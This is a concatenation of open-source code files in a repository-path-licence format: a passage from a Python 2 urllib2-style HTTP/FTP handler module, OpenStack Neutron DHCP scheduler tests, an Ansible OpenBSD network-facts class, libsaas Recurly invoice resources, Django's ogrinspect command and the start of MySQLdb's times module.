        host = request.get_host()
        if not host:
            raise URLError('no host given')
        if request.has_data():  # POST
            data = request.get_data()
            if not request.has_header('Content-type'):
                request.add_unredirected_header(
                    'Content-type',
                    'application/x-www-form-urlencoded')
            if not request.has_header('Content-length'):
                request.add_unredirected_header(
                    'Content-length', '%d' % len(data))
        sel_host = host
        if request.has_proxy():
            # When proxied, the Host header must name the origin server
            # taken from the request selector, not the proxy.
            scheme, sel = splittype(request.get_selector())
            sel_host, sel_path = splithost(sel)
        if not request.has_header('Host'):
            request.add_unredirected_header('Host', sel_host)
        for name, value in self.parent.addheaders:
            name = name.capitalize()
            if not request.has_header(name):
                request.add_unredirected_header(name, value)
        return request
    def do_open(self, http_class, req):
        """Return an addinfourl object for the request, using http_class.

        http_class must implement the HTTPConnection API from httplib.
        The addinfourl return value is a file-like object.  It also
        has methods and attributes including:

        - info(): return a mimetools.Message object for the headers

        - geturl(): return the original request URL

        - code: HTTP status code
        """
        host_port = req.get_host()
        if not host_port:
            raise URLError('no host given')
        try:
            h = http_class(host_port, timeout=req.timeout)
        except TypeError:
            # Python < 2.6, no per-connection timeout support
            h = http_class(host_port)
        h.set_debuglevel(self._debuglevel)
        headers = dict(req.headers)
        headers.update(req.unredirected_hdrs)
        # We want to make an HTTP/1.1 request, but the addinfourl
        # class isn't prepared to deal with a persistent connection.
        # It will try to read all remaining data from the socket,
        # which will block while the server waits for the next request.
        # So make sure the connection gets closed after the (only)
        # request.
        headers["Connection"] = "close"
        # Title-case all header names so duplicates differing only in
        # case collapse into one entry.
        headers = dict(
            (name.title(), val) for name, val in headers.items())
        if req._tunnel_host:
            # HTTPS through a proxy needs CONNECT tunnelling support.
            if not hasattr(h, "set_tunnel"):
                if not hasattr(h, "_set_tunnel"):
                    raise URLError("HTTPS through proxy not supported "
                                   "(Python >= 2.6.4 required)")
                else:
                    # python 2.6
                    set_tunnel = h._set_tunnel
            else:
                set_tunnel = h.set_tunnel
            set_tunnel(req._tunnel_host)
        try:
            h.request(req.get_method(), req.get_selector(), req.data, headers)
            r = h.getresponse()
        except socket.error, err:  # XXX what error?
            raise URLError(err)
        # Pick apart the HTTPResponse object to get the addinfourl
        # object initialized properly.
        # Wrap the HTTPResponse object in socket's file object adapter
        # for Windows.  That adapter calls recv(), so delegate recv()
        # to read().  This weird wrapping allows the returned object to
        # have readline() and readlines() methods.
        # XXX It might be better to extract the read buffering code
        # out of socket._fileobject() and into a base class.
        r.recv = r.read
        fp = create_readline_wrapper(r)
        resp = closeable_response(fp, r.msg, req.get_full_url(),
                                  r.status, r.reason)
        return resp
class HTTPHandler(AbstractHTTPHandler):
    # Opens plain http:// URLs via httplib.HTTPConnection.
    def http_open(self, req):
        return self.do_open(httplib.HTTPConnection, req)
    # Request preprocessing is shared with the HTTPS handler.
    http_request = AbstractHTTPHandler.do_request_
# HTTPS support is conditional: Python can be built without SSL, in
# which case httplib has no 'HTTPS' attribute.
if hasattr(httplib, 'HTTPS'):
    class HTTPSConnectionFactory:
        # Callable producing HTTPSConnection objects bound to one client
        # key/certificate pair.
        def __init__(self, key_file, cert_file):
            self._key_file = key_file
            self._cert_file = cert_file
        def __call__(self, hostport):
            return httplib.HTTPSConnection(
                hostport,
                key_file=self._key_file, cert_file=self._cert_file)
    class HTTPSHandler(AbstractHTTPHandler):
        # Opens https:// URLs, optionally presenting per-URL client
        # certificates via client_cert_manager.
        def __init__(self, client_cert_manager=None):
            AbstractHTTPHandler.__init__(self)
            self.client_cert_manager = client_cert_manager
        def https_open(self, req):
            if self.client_cert_manager is not None:
                # Look up a client certificate for this URL and bake it
                # into the connection factory.
                key_file, cert_file = self.client_cert_manager.find_key_cert(
                    req.get_full_url())
                conn_factory = HTTPSConnectionFactory(key_file, cert_file)
            else:
                conn_factory = httplib.HTTPSConnection
            return self.do_open(conn_factory, req)
        https_request = AbstractHTTPHandler.do_request_
class HTTPCookieProcessor(BaseHandler):
    """Handle HTTP cookies.

    Public attributes:

    cookiejar: CookieJar instance
    """
    def __init__(self, cookiejar=None):
        self.cookiejar = cookiejar
        if self.cookiejar is None:
            # No jar supplied: start with a fresh, empty one.
            self.cookiejar = CookieJar()

    def http_request(self, request):
        # Attach any matching stored cookies to the outgoing request.
        self.cookiejar.add_cookie_header(request)
        return request

    def http_response(self, request, response):
        # Remember cookies the server set in this response.
        self.cookiejar.extract_cookies(response, request)
        return response

    https_request = http_request
    https_response = http_response
class UnknownHandler(BaseHandler):
    """Reject URL schemes that no registered handler supports."""

    def unknown_open(self, req):
        raise URLError('unknown url type: %s' % req.get_type())
def parse_keqv_list(l):
    """Parse a list of key=value strings into a dict.

    Keys are assumed not to repeat.  Values wrapped in double quotes
    have the quotes stripped.
    """
    parsed = {}
    for item in l:
        key, value = item.split('=', 1)
        if value[0] == '"' == value[-1]:
            value = value[1:-1]
        parsed[key] = value
    return parsed
def parse_http_list(s):
    """Parse lists as described by RFC 2068 Section 2.

    In particular, parse comma-separated lists where the elements of
    the list may include quoted-strings.  A quoted-string could
    contain a comma.  A non-quoted string could have quotes in the
    middle.  Neither commas nor quotes count if they are escaped.

    Only double-quotes count, not single-quotes.
    """
    parts = []
    current = ''
    in_quote = False
    escaped = False
    for ch in s:
        if escaped:
            # Previous char was a backslash inside a quoted-string: the
            # backslash is dropped and this char taken literally.
            current += ch
            escaped = False
        elif in_quote:
            if ch == '\\':
                escaped = True
            else:
                if ch == '"':
                    in_quote = False
                current += ch
        elif ch == ',':
            # Unquoted comma terminates the current element.
            parts.append(current)
            current = ''
        else:
            if ch == '"':
                in_quote = True
            current += ch
    # append last part (a trailing empty element is dropped)
    if current:
        parts.append(current)
    return [part.strip() for part in parts]
class FileHandler(BaseHandler):
    """Open file:// URLs from the local filesystem.

    URLs of the form file://host/path with a non-empty, non-local host
    are redirected to FTP.
    """
    # Use local file or FTP depending on form of URL
    def file_open(self, req):
        url = req.get_selector()
        if url[:2] == '//' and url[2:3] != '/':
            # file://host/... with a non-empty host: re-open as FTP.
            req.type = 'ftp'
            return self.parent.open(req)
        else:
            return self.open_local_file(req)
    # names for the localhost
    names = None
    def get_names(self):
        # Lazily compute and cache the IP addresses that count as local.
        if FileHandler.names is None:
            try:
                FileHandler.names = (socket.gethostbyname('localhost'),
                                     socket.gethostbyname(socket.gethostname()))
            except socket.gaierror:
                # Hostname does not resolve; fall back to localhost only.
                FileHandler.names = (socket.gethostbyname('localhost'),)
        return FileHandler.names
    # not entirely sure what the rules are here
    def open_local_file(self, req):
        try:
            import email.utils as emailutils
        except ImportError:
            # python 2.4
            import email.Utils as emailutils
        import mimetypes
        host = req.get_host()
        file = req.get_selector()
        localfile = url2pathname(file)
        try:
            stats = os.stat(localfile)
            size = stats.st_size
            modified = emailutils.formatdate(stats.st_mtime, usegmt=True)
            mtype = mimetypes.guess_type(file)[0]
            # Synthesise the response headers from the file's metadata.
            headers = mimetools.Message(StringIO(
                'Content-type: %s\nContent-length: %d\nLast-modified: %s\n' %
                (mtype or 'text/plain', size, modified)))
            if host:
                host, port = splitport(host)
            if not host or \
                (not port and socket.gethostbyname(host) in self.get_names()):
                return addinfourl(open(localfile, 'rb'),
                                  headers, 'file:'+file)
        except OSError, msg:
            # urllib2 users shouldn't expect OSErrors coming from urlopen()
            raise URLError(msg)
        raise URLError('file not on local host')
class FTPHandler(BaseHandler):
    """Open ftp:// URLs via ftplib, honouring ;type= URL attributes."""
    def ftp_open(self, req):
        import ftplib
        import mimetypes
        host = req.get_host()
        if not host:
            raise URLError('ftp error: no host given')
        host, port = splitport(host)
        if port is None:
            port = ftplib.FTP_PORT
        else:
            port = int(port)
        # username/password handling
        user, host = splituser(host)
        if user:
            user, passwd = splitpasswd(user)
        else:
            passwd = None
        host = unquote(host)
        user = unquote(user or '')
        passwd = unquote(passwd or '')
        try:
            host = socket.gethostbyname(host)
        except socket.error, msg:
            raise URLError(msg)
        path, attrs = splitattr(req.get_selector())
        dirs = path.split('/')
        dirs = map(unquote, dirs)
        dirs, file = dirs[:-1], dirs[-1]
        if dirs and not dirs[0]:
            # Absolute path: drop the leading empty component.
            dirs = dirs[1:]
        try:
            fw = self.connect_ftp(user, passwd, host, port, dirs, req.timeout)
            # 'I'mage (binary) transfer for files, 'D'irectory listing
            # otherwise; may be overridden by a ;type= attribute below.
            type = file and 'I' or 'D'
            for attr in attrs:
                attr, value = splitvalue(attr)
                if attr.lower() == 'type' and \
                   value in ('a', 'A', 'i', 'I', 'd', 'D'):
                    type = value.upper()
            fp, retrlen = fw.retrfile(file, type)
            headers = ""
            mtype = mimetypes.guess_type(req.get_full_url())[0]
            if mtype:
                headers += "Content-type: %s\n" % mtype
            if retrlen is not None and retrlen >= 0:
                headers += "Content-length: %d\n" % retrlen
            sf = StringIO(headers)
            headers = mimetools.Message(sf)
            return addinfourl(fp, headers, req.get_full_url())
        except ftplib.all_errors, msg:
            # Re-raise as URLError with the original traceback attached.
            raise URLError, ('ftp error: %s' % msg), sys.exc_info()[2]
    def connect_ftp(self, user, passwd, host, port, dirs, timeout):
        try:
            fw = ftpwrapper(user, passwd, host, port, dirs, timeout)
        except TypeError:
            # Python < 2.6, no per-connection timeout support
            fw = ftpwrapper(user, passwd, host, port, dirs)
##        fw.ftp.set_debuglevel(1)
        return fw
class CacheFTPHandler(FTPHandler):
    """FTPHandler that keeps a pool of recently used FTP connections.

    Connections expire ``delay`` seconds after last use and the pool is
    capped at ``max_conns`` entries.
    """
    # XXX would be nice to have pluggable cache strategies
    # XXX this stuff is definitely not thread safe
    def __init__(self):
        self.cache = {}
        self.timeout = {}
        # soonest is the earliest expiry time seen so far; used to skip
        # scanning the pool when nothing can have expired yet.
        self.soonest = 0
        self.delay = 60
        self.max_conns = 16
    def setTimeout(self, t):
        # Seconds an idle connection stays cached.
        self.delay = t
    def setMaxConns(self, m):
        self.max_conns = m
    def connect_ftp(self, user, passwd, host, port, dirs, timeout):
        # Reuse a cached connection for this (user, host, port, path,
        # timeout) key, refreshing its expiry; create one otherwise.
        key = user, host, port, '/'.join(dirs), timeout
        if key in self.cache:
            self.timeout[key] = time.time() + self.delay
        else:
            self.cache[key] = ftpwrapper(user, passwd, host, port, dirs, timeout)
            self.timeout[key] = time.time() + self.delay
        self.check_cache()
        return self.cache[key]
    def check_cache(self):
        # Evict expired connections and enforce the pool-size cap.
        # NOTE: iterating .items() while deleting relies on Python 2
        # semantics where items() returns a list snapshot.
        # first check for old ones
        t = time.time()
        if self.soonest <= t:
            for k, v in self.timeout.items():
                if v < t:
                    self.cache[k].close()
                    del self.cache[k]
                    del self.timeout[k]
        # NOTE(review): min() raises ValueError when the pool is empty --
        # presumably callers never reach here with an empty pool; confirm.
        self.soonest = min(self.timeout.values())
        # then check the size
        if len(self.cache) == self.max_conns:
            for k, v in self.timeout.items():
                if v == self.soonest:
                    del self.cache[k]
                    del self.timeout[k]
                    break
            self.soonest = min(self.timeout.values())
| agpl-3.0 |
rdo-management/neutron | neutron/tests/unit/test_dhcp_scheduler.py | 1 | 11269 | # Copyright 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import datetime
import mock
from oslo_utils import timeutils
import testscenarios
from neutron.common import constants
from neutron.common import topics
from neutron import context
from neutron.db import agents_db
from neutron.db import agentschedulers_db as sched_db
from neutron.db import models_v2
from neutron.extensions import dhcpagentscheduler
from neutron.scheduler import dhcp_agent_scheduler
from neutron.tests.unit import testlib_api
# Required to generate tests from scenarios. Not compatible with nose.
# testscenarios multiplies each test method by the entries in a class's
# 'scenarios' attribute via unittest's load_tests protocol.
load_tests = testscenarios.load_tests_apply_scenarios
class TestDhcpSchedulerBaseTestCase(testlib_api.SqlTestCase):
    """Common fixture: an admin context, one saved network, agent helpers."""

    def setUp(self):
        super(TestDhcpSchedulerBaseTestCase, self).setUp()
        self.ctx = context.get_admin_context()
        self.network = {'id': 'foo_network_id'}
        self.network_id = 'foo_network_id'
        self._save_networks([self.network_id])

    def _get_agents(self, hosts):
        # Build one live DHCP agent row per host (not yet persisted).
        return [
            agents_db.Agent(
                binary='neutron-dhcp-agent',
                host=host,
                topic=topics.DHCP_AGENT,
                configurations="",
                agent_type=constants.AGENT_TYPE_DHCP,
                created_at=timeutils.utcnow(),
                started_at=timeutils.utcnow(),
                heartbeat_timestamp=timeutils.utcnow())
            for host in hosts
        ]

    def _save_agents(self, agents):
        # Persist each agent in its own subtransaction.
        for agent in agents:
            with self.ctx.session.begin(subtransactions=True):
                self.ctx.session.add(agent)

    def _create_and_set_agents_down(self, hosts, down_agent_count=0):
        """Persist agents for *hosts*; mark the first down_agent_count dead."""
        dhcp_agents = self._get_agents(hosts)
        # bring down the specified agents
        for agent in dhcp_agents[:down_agent_count]:
            # An hour-old heartbeat is well past the agent-down threshold.
            old_time = agent['heartbeat_timestamp']
            hour_old = old_time - datetime.timedelta(hours=1)
            agent['heartbeat_timestamp'] = hour_old
            agent['started_at'] = hour_old
        self._save_agents(dhcp_agents)
        return dhcp_agents

    def _save_networks(self, networks):
        for network_id in networks:
            with self.ctx.session.begin(subtransactions=True):
                self.ctx.session.add(models_v2.Network(id=network_id))

    def _test_schedule_bind_network(self, agents, network_id):
        """Bind *network_id* to *agents* and assert the bindings landed."""
        scheduler = dhcp_agent_scheduler.ChanceScheduler()
        scheduler._schedule_bind_network(self.ctx, agents, network_id)
        results = self.ctx.session.query(
            sched_db.NetworkDhcpAgentBinding).filter_by(
            network_id=network_id).all()
        self.assertEqual(len(agents), len(results))
        for result in results:
            self.assertEqual(network_id, result.network_id)
class TestDhcpScheduler(TestDhcpSchedulerBaseTestCase):
    def test_schedule_bind_network_single_agent(self):
        """A network can be bound to a single agent."""
        agents = self._create_and_set_agents_down(['host-a'])
        self._test_schedule_bind_network(agents, self.network_id)

    def test_schedule_bind_network_multi_agents(self):
        """A network can be bound to several agents at once."""
        agents = self._create_and_set_agents_down(['host-a', 'host-b'])
        self._test_schedule_bind_network(agents, self.network_id)

    def test_schedule_bind_network_multi_agent_fail_one(self):
        """Re-binding an already-bound network logs instead of failing."""
        agents = self._create_and_set_agents_down(['host-a'])
        self._test_schedule_bind_network(agents, self.network_id)
        with mock.patch.object(dhcp_agent_scheduler.LOG, 'info') as fake_log:
            self._test_schedule_bind_network(agents, self.network_id)
            self.assertEqual(1, fake_log.call_count)
class TestAutoScheduleNetworks(TestDhcpSchedulerBaseTestCase):
    """Unit test scenarios for ChanceScheduler.auto_schedule_networks.

    network_present
        Network is present or not

    enable_dhcp
        Dhcp is enabled or disabled in the subnet of the network

    scheduled_already
        Network is already scheduled to the agent or not

    agent_down
        Dhcp agent is down or alive

    valid_host
        If true, then an valid host is passed to schedule the network,
        else an invalid host is passed.
    """
    scenarios = [
        ('Network present',
         dict(network_present=True,
              enable_dhcp=True,
              scheduled_already=False,
              agent_down=False,
              valid_host=True)),

        ('No network',
         dict(network_present=False,
              enable_dhcp=False,
              scheduled_already=False,
              agent_down=False,
              valid_host=True)),

        ('Network already scheduled',
         dict(network_present=True,
              enable_dhcp=True,
              scheduled_already=True,
              agent_down=False,
              valid_host=True)),

        ('Agent down',
         # NOTE(review): agent_down=False makes this scenario identical
         # to 'Network present' -- confirm whether agent_down=True was
         # intended here.
         dict(network_present=True,
              enable_dhcp=True,
              scheduled_already=False,
              agent_down=False,
              valid_host=True)),

        ('dhcp disabled',
         dict(network_present=True,
              enable_dhcp=False,
              scheduled_already=False,
              agent_down=False,
              valid_host=False)),

        ('Invalid host',
         dict(network_present=True,
              enable_dhcp=True,
              scheduled_already=False,
              agent_down=False,
              valid_host=False)),
    ]

    def test_auto_schedule_network(self):
        """Run auto_schedule_networks under the current scenario."""
        plugin = mock.MagicMock()
        # Return a subnet only when the scenario says the network exists.
        plugin.get_subnets.return_value = (
            [{"network_id": self.network_id, "enable_dhcp": self.enable_dhcp}]
            if self.network_present else [])
        scheduler = dhcp_agent_scheduler.ChanceScheduler()
        if self.network_present:
            down_agent_count = 1 if self.agent_down else 0
            agents = self._create_and_set_agents_down(
                ['host-a'], down_agent_count=down_agent_count)
            if self.scheduled_already:
                self._test_schedule_bind_network(agents, self.network_id)
        # The call reports True whenever a DHCP-enabled network existed;
        # a binding is only created when the host was also valid.
        expected_result = (self.network_present and self.enable_dhcp)
        expected_hosted_agents = (1 if expected_result and
                                  self.valid_host else 0)
        host = "host-a" if self.valid_host else "host-b"
        observed_ret_value = scheduler.auto_schedule_networks(
            plugin, self.ctx, host)
        self.assertEqual(expected_result, observed_ret_value)
        hosted_agents = self.ctx.session.query(
            sched_db.NetworkDhcpAgentBinding).all()
        self.assertEqual(expected_hosted_agents, len(hosted_agents))
class TestNetworksFailover(TestDhcpSchedulerBaseTestCase,
                           sched_db.DhcpAgentSchedulerDbMixin):
    # Tests rescheduling of networks away from dead DHCP agents.  The db
    # mixin is mixed into the test case itself so the failover entry point
    # (remove_networks_from_down_agents) can be called on `self` directly.
    # NOTE(review): contextlib.nested is Python 2 only; confirm before
    # running this module under Python 3.
    def test_reschedule_network_from_down_agent(self):
        # agents[0] is down (down_agent_count=1); agents[1] stays alive.
        agents = self._create_and_set_agents_down(['host-a', 'host-b'], 1)
        self._test_schedule_bind_network([agents[0]], self.network_id)
        self._save_networks(["foo-network-2"])
        self._test_schedule_bind_network([agents[1]], "foo-network-2")
        with contextlib.nested(
            mock.patch.object(self, 'remove_network_from_dhcp_agent'),
            mock.patch.object(self, 'schedule_network',
                              return_value=[agents[1]]),
            mock.patch.object(self, 'get_network', create=True,
                              return_value={'id': self.network_id})
        ) as (rn, sch, getn):
            notifier = mock.MagicMock()
            self.agent_notifiers[constants.AGENT_TYPE_DHCP] = notifier
            self.remove_networks_from_down_agents()
            # The network must be unbound from the dead agent, rescheduled,
            # and the newly chosen agent notified of the addition.
            rn.assert_called_with(mock.ANY, agents[0].id, self.network_id)
            sch.assert_called_with(mock.ANY, {'id': self.network_id})
            notifier.network_added_to_agent.assert_called_with(
                mock.ANY, self.network_id, agents[1].host)
    def _test_failed_rescheduling(self, rn_side_effect=None):
        # schedule_network returning None simulates "no agent available";
        # rn_side_effect lets callers inject failures during the unbind.
        agents = self._create_and_set_agents_down(['host-a'], 1)
        self._test_schedule_bind_network([agents[0]], self.network_id)
        with contextlib.nested(
            mock.patch.object(
                self, 'remove_network_from_dhcp_agent',
                side_effect=rn_side_effect),
            mock.patch.object(self, 'schedule_network',
                              return_value=None),
            mock.patch.object(self, 'get_network', create=True,
                              return_value={'id': self.network_id})
        ) as (rn, sch, getn):
            notifier = mock.MagicMock()
            self.agent_notifiers[constants.AGENT_TYPE_DHCP] = notifier
            self.remove_networks_from_down_agents()
            rn.assert_called_with(mock.ANY, agents[0].id, self.network_id)
            sch.assert_called_with(mock.ANY, {'id': self.network_id})
            # Rescheduling failed, so no agent may be notified.
            self.assertFalse(notifier.network_added_to_agent.called)
    def test_reschedule_network_from_down_agent_failed(self):
        self._test_failed_rescheduling()
    def test_reschedule_network_from_down_agent_concurrent_removal(self):
        # A concurrent removal surfaces as NetworkNotHostedByDhcpAgent and
        # must be tolerated by the failover loop.
        self._test_failed_rescheduling(
            rn_side_effect=dhcpagentscheduler.NetworkNotHostedByDhcpAgent(
                network_id='foo', agent_id='bar'))
    def test_filter_bindings(self):
        bindings = [
            sched_db.NetworkDhcpAgentBinding(network_id='foo1',
                                             dhcp_agent={'id': 'id1'}),
            sched_db.NetworkDhcpAgentBinding(network_id='foo2',
                                             dhcp_agent={'id': 'id1'}),
            sched_db.NetworkDhcpAgentBinding(network_id='foo3',
                                             dhcp_agent={'id': 'id2'}),
            sched_db.NetworkDhcpAgentBinding(network_id='foo4',
                                             dhcp_agent={'id': 'id2'})]
        # agent_starting_up is consulted once per distinct agent:
        # True for id1 (its bindings are kept), False for id2 (filtered out).
        with mock.patch.object(self, 'agent_starting_up',
                               side_effect=[True, False]):
            res = [b for b in self._filter_bindings(None, bindings)]
            # once per each agent id1 and id2
            self.assertEqual(2, len(res))
            res_ids = [b.network_id for b in res]
            self.assertIn('foo3', res_ids)
            self.assertIn('foo4', res_ids)
    def test_remove_networks_from_down_agents_catches_all(self):
        # Even an unexpected exception while rescheduling must not escape
        # the periodic failover task.
        with contextlib.nested(
            mock.patch.object(
                self, 'remove_network_from_dhcp_agent',
                side_effect=Exception("Unexpected exception!")),
            mock.patch.object(
                self, '_filter_bindings',
                return_value=[sched_db.NetworkDhcpAgentBinding(
                    network_id='foo', dhcp_agent_id='bar')])
        ):
            self.remove_networks_from_down_agents()
| apache-2.0 |
ptemplier/ansible | lib/ansible/module_utils/facts/network/openbsd.py | 232 | 1600 | # This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils.facts.network.base import NetworkCollector
from ansible.module_utils.facts.network.generic_bsd import GenericBsdIfconfigNetwork
class OpenBSDNetwork(GenericBsdIfconfigNetwork):
    """
    This is the OpenBSD Network Class.
    It uses the GenericBsdIfconfigNetwork.
    """
    platform = 'OpenBSD'
    # OpenBSD 'ifconfig -a' does not have information about aliases
    def get_interfaces_info(self, ifconfig_path, ifconfig_options='-aA'):
        # '-A' adds alias/address details that plain '-a' omits on OpenBSD;
        # everything else is handled by the generic BSD parser.
        return super(OpenBSDNetwork, self).get_interfaces_info(ifconfig_path, ifconfig_options)
    # Return macaddress instead of lladdr
    def parse_lladdr_line(self, words, current_if, ips):
        # Override: store the link-level address under the cross-platform
        # 'macaddress' fact key rather than OpenBSD's native 'lladdr'.
        current_if['macaddress'] = words[1]
        current_if['type'] = 'ether'
class OpenBSDNetworkCollector(NetworkCollector):
    # Registers the OpenBSD fact class with the collector framework.
    _fact_class = OpenBSDNetwork
    _platform = 'OpenBSD'
| gpl-3.0 |
CptLemming/libsaas | libsaas/services/recurly/invoices.py | 4 | 2232 | from libsaas import http, parsers
from libsaas.services import base
from . import resource
def parse_passthrough(body, code, headers):
    """Return the raw response body, raising HTTPError on non-2xx codes."""
    if code < 200 or code >= 300:
        raise http.HTTPError(body, code, headers)
    return body
class InvoicesBase(resource.RecurlyResource):
    """Shared base for invoice resources.

    Recurly invoices are immutable once issued, so update and delete are
    disabled for every subclass.
    """
    path = 'invoices'
    def update(self, *args, **kwargs):
        raise base.MethodNotSupported()
    def delete(self, *args, **kwargs):
        raise base.MethodNotSupported()
class Invoices(InvoicesBase):
    """Collection endpoint for all invoices on the account."""
    @base.apimethod
    def get(self, state=None, cursor=None, per_page=None):
        """
        Fetch all your invoices.
        :var state: The state of invoices to return: "open", "collected",
            "failed", or "past_due".
        :vartype state: str
        :var cursor: Opaque pagination cursor returned by a previous page.
        :vartype cursor: str
        :var per_page: Maximum number of invoices to return per page.
        :vartype per_page: int
        """
        params = base.get_params(('state', 'cursor', 'per_page'), locals())
        request = http.Request('GET', self.get_url(), params)
        return request, parsers.parse_xml
    def create(self, *args, **kwargs):
        # Invoices cannot be created directly through this endpoint.
        raise base.MethodNotSupported()
class Invoice(InvoicesBase):
    """Single-invoice endpoint: PDF download and collection-state changes."""
    def create(self, *args, **kwargs):
        raise base.MethodNotSupported()
    @base.apimethod
    def get_pdf(self, language='en-US'):
        """
        Fetch a PDF blob for the invoice.
        :var language: The language for the invoice, defaults to "en-US'.
        :vartype language: str
        """
        self.require_item()
        # Content negotiation selects the PDF rendering; the raw bytes are
        # returned unparsed via parse_passthrough.
        headers = {'Accept': 'application/pdf', 'Accept-Language': language}
        request = http.Request('GET', self.get_url(), {}, headers)
        return request, parse_passthrough
    @base.apimethod
    def mark_successful(self):
        """
        Mark an invoice as paid successfully
        """
        self.require_item()
        url = '{0}/mark_successful'.format(self.get_url())
        request = http.Request('PUT', url)
        return request, parsers.parse_empty
    @base.apimethod
    def mark_failed(self):
        """
        Mark an invoice as failed collection
        """
        self.require_item()
        url = '{0}/mark_failed'.format(self.get_url())
        request = http.Request('PUT', url)
        return request, parsers.parse_empty
class AccountInvoices(InvoicesBase):
    """Invoices scoped to a single account; behaviour inherited unchanged."""
    pass
| mit |
mozilla/captain | vendor/lib/python/django/contrib/gis/management/commands/ogrinspect.py | 126 | 6065 | import os
from optparse import make_option
from django.contrib.gis import gdal
from django.core.management.base import LabelCommand, CommandError
def layer_option(option, opt, value, parser):
    """
    Callback for `make_option` for the `ogrinspect` `layer_key`
    keyword option which may be an integer or a string.
    """
    try:
        # Numeric layer keys become ints (layer index)...
        setattr(parser.values, option.dest, int(value))
    except ValueError:
        # ...anything else is kept as a string layer identifier.
        setattr(parser.values, option.dest, value)
def list_option(option, opt, value, parser):
    """
    Callback for `make_option` for `ogrinspect` keywords that require
    a string list. If the string is 'True'/'true' then the option
    value will be a boolean instead.
    """
    if value.lower() == 'true':
        dest = True
    else:
        # split() already returns a list; the previous identity
        # comprehension over it was redundant.
        dest = value.split(',')
    setattr(parser.values, option.dest, dest)
class Command(LabelCommand):
    help = ('Inspects the given OGR-compatible data source (e.g., a shapefile) and outputs\n'
            'a GeoDjango model with the given model name. For example:\n'
            ' ./manage.py ogrinspect zipcode.shp Zipcode')
    args = '[data_source] [model_name]'
    # optparse option definitions; the callback-based options accept either
    # a comma-separated field list or the literal 'true' (see list_option).
    option_list = LabelCommand.option_list + (
        make_option('--blank', dest='blank', type='string', action='callback',
                    callback=list_option, default=False,
                    help='Use a comma separated list of OGR field names to add '
                    'the `blank=True` option to the field definition. Set with'
                    '`true` to apply to all applicable fields.'),
        make_option('--decimal', dest='decimal', type='string', action='callback',
                    callback=list_option, default=False,
                    help='Use a comma separated list of OGR float fields to '
                    'generate `DecimalField` instead of the default '
                    '`FloatField`. Set to `true` to apply to all OGR float fields.'),
        make_option('--geom-name', dest='geom_name', type='string', default='geom',
                    help='Specifies the model name for the Geometry Field '
                    '(defaults to `geom`)'),
        make_option('--layer', dest='layer_key', type='string', action='callback',
                    callback=layer_option, default=0,
                    help='The key for specifying which layer in the OGR data '
                    'source to use. Defaults to 0 (the first layer). May be '
                    'an integer or a string identifier for the layer.'),
        make_option('--multi-geom', action='store_true', dest='multi_geom', default=False,
                    help='Treat the geometry in the data source as a geometry collection.'),
        make_option('--name-field', dest='name_field',
                    help='Specifies a field name to return for the `__unicode__` function.'),
        make_option('--no-imports', action='store_false', dest='imports', default=True,
                    help='Do not include `from django.contrib.gis.db import models` '
                    'statement.'),
        make_option('--null', dest='null', type='string', action='callback',
                    callback=list_option, default=False,
                    help='Use a comma separated list of OGR field names to add '
                    'the `null=True` option to the field definition. Set with'
                    '`true` to apply to all applicable fields.'),
        make_option('--srid', dest='srid',
                    help='The SRID to use for the Geometry Field. If it can be '
                    'determined, the SRID of the data source is used.'),
        make_option('--mapping', action='store_true', dest='mapping',
                    help='Generate mapping dictionary for use with `LayerMapping`.')
    )
    requires_model_validation = False
    def handle(self, *args, **options):
        """Inspect the OGR data source and print the generated model code.

        Expects exactly two positional arguments (data source path and model
        name); requires GDAL to be installed.
        """
        try:
            data_source, model_name = args
        except ValueError:
            raise CommandError('Invalid arguments, must provide: %s' % self.args)
        if not gdal.HAS_GDAL:
            raise CommandError('GDAL is required to inspect geospatial data sources.')
        # Removing options with `None` values.
        options = dict([(k, v) for k, v in options.items() if not v is None])
        # Getting the OGR DataSource from the string parameter.
        try:
            ds = gdal.DataSource(data_source)
        except gdal.OGRException as msg:
            raise CommandError(msg)
        # Whether the user wants to generate the LayerMapping dictionary as well.
        show_mapping = options.pop('mapping', False)
        # Getting rid of settings that `_ogrinspect` doesn't like.
        # (The popped values are deliberately unused.)
        verbosity = options.pop('verbosity', False)
        settings = options.pop('settings', False)
        # Returning the output of ogrinspect with the given arguments
        # and options.
        from django.contrib.gis.utils.ogrinspect import _ogrinspect, mapping
        output = [s for s in _ogrinspect(ds, model_name, **options)]
        if show_mapping:
            # Constructing the keyword arguments for `mapping`, and
            # calling it on the data source.
            kwargs = {'geom_name' : options['geom_name'],
                      'layer_key' : options['layer_key'],
                      'multi_geom' : options['multi_geom'],
                      }
            mapping_dict = mapping(ds, **kwargs)
            # This extra legwork is so that the dictionary definition comes
            # out in the same order as the fields in the model definition.
            rev_mapping = dict([(v, k) for k, v in mapping_dict.items()])
            output.extend(['', '# Auto-generated `LayerMapping` dictionary for %s model' % model_name,
                           '%s_mapping = {' % model_name.lower()])
            output.extend([" '%s' : '%s'," % (rev_mapping[ogr_fld], ogr_fld) for ogr_fld in ds[options['layer_key']].fields])
            output.extend([" '%s' : '%s'," % (options['geom_name'], mapping_dict[options['geom_name']]), '}'])
        return '\n'.join(output) + '\n'
| mpl-2.0 |
cparawhore/ProyectoSubastas | site-packages/MySQLdb/times.py | 76 | 3488 | """times module
This module provides some Date and Time classes for dealing with MySQL data.
Use Python datetime module to handle date and time columns."""
import math
from time import localtime
from datetime import date, datetime, time, timedelta
from _mysql import string_literal
# DB-API 2.0 type constructors, aliased directly to the stdlib datetime
# classes (this module delegates all date/time handling to datetime).
Date = date
Time = time
TimeDelta = timedelta
Timestamp = datetime
# Legacy aliases kept for compatibility with the old mx.DateTime names.
